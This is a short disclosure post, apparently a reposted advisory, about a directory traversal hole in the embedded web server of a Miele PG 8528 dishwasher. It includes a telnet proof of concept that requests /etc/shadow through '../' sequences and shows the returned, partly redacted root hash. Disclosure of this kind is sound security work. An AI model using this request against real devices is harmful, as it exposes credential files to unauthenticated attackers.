Miele Professional PG 8528 dishwasher insecure – Web Server Directory Traversal

Details:
========
The corresponding embeded webserver “PST10 WebServer” typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename=”./etc/shadow”
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[…snip…]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!

Robin Edgar

Organisational Structures | Technology and Science | Military, IT and Lifestyle consultancy | Social, Broadcast & Cross Media | Flying aircraft

 robin@edgarbv.com  https://www.edgarbv.com

Leave a Reply